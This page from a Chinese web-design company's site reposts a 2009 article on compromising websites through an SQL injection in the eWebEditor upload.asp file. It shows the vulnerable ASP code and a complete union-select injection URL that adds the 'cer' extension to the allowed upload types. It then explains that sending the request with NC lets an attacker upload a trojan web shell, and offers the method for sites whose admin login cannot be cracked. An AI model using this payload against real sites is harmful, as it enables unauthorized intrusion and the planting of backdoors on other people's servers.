青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 脚本安全 >> 正文  
ewebeditor之上传任意文件入侵网站

文章来源: 西宁威势电子信息服务有限公司     发布时间:2009-5-3    浏览次数:6257    tags:ewebeditor 上传木马

    目前网上流传太多ewebeidtor的修改版 lite版、216版的ewebeditor 存在一个注入漏洞 之后一个版也存在这样的问题。前段时间拉至尊宝渗透一内网时发现这个东西。无后台 无法登陆 默认数据库 但用处也不大,所以就深刻研究了下这个注入 发现可以通过union 来控制允许上传类型的列表,随后时间成功利用此漏洞拿了不少东西,分享下。漏洞文件是upload.asp

ASP/Visual Basic代码

Sub InitUpload()  

      sType = UCase(Trim(Request.QueryString("type"))) 

       sStyleName = Trim(Request.QueryString("style"))

         sSql = "select * from ewebeditor_style where s_name='" & sStyleName &         "'"       

 oRs.Open sSql, oConn, 0, 1

        If Not oRs.Eof Then    

      sUploadDir = oRs("S_UploadDir")  

        sUploadDir = Replace(sUploadDir, "", "/")   

      If Right(sUploadDir, 1) <> "/" Then     

    sUploadDir = sUploadDir & "/"    

     End If         

 Select Case sType     

      Case "FILE"        

     sAllowExt = oRs("S_FileExt")  

         nAllowSize = oRs("S_FileSize")    

         Case "MEDIA"        

   sAllowExt = oRs("S_MediaExt")

             nAllowSize = oRs("S_MediaSize") 

          Case "FLASH"       

      sAllowExt = oRs("S_FlashExt")  

           nAllowSize = oRs("S_FlashSize")      

     Case Else         

    sAllowExt = oRs("S_ImageExt")   

          nAllowSize = oRs("S_ImageSize")  

       End Select    

   Else       

  OutScript("parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!')")         End If   

     oRs.Close    

    ' 任何情况下都不允许上传asp脚本文件  

      sAllowExt = Replace(UCase(sAllowExt), "ASP", "")      

End Sub sStyleName

变量是直接从style中读取到没有经过任何过滤,我们要做的就是通过 union 增加一个sAllowExt类型 构造SQL代码upload.asp?action=save&type=IMAGE&style=fox' union select      S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileE­xt,S_FlashExt,      [S_ImageExt]+'| cer',S_MediaExt,S_RemoteExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,­S_RemoteSize

,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObje­ct,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder      from ewebeditor_style where s_name='standard' and 'a'='a     union要之前的select结果为空(这个好办) 。同时要知道字段数(下载到数据库查也能查到了) ,我使用[S_ImageExt]+'|cer'使S_ImageExt中加入"|cer"串。用NC发包就可以上传木马了。

针对没有后台 有默认数据库 或者猜解不到密码的时候 可以用此方法试下 默认库中会泄露ewebeditor的版本信息的


上一篇:常见的一句话木马
下一篇:[原创]ewebeditor上传任意文件漏洞利用工具
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全